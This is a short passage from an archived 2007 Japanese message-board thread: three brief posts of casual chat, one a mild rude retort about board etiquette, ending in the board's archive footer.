286 :ワキガって言った人へ:2007/02/19(月) 08:20:13 ID:yw6dNlDY
生人物はそんなに不潔にみえないとおも

287 :ユー&名無しネ:2007/02/20(火) 01:22:29 ID:kKsNNA5/
とりあえずsageを知らない方は逝けですわ


wwwwwwwwwww

288 :ユー&名無しネ:2007/02/22(木) 23:12:26 ID:xsh4OQ2M
今週お休みだからシマンネ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)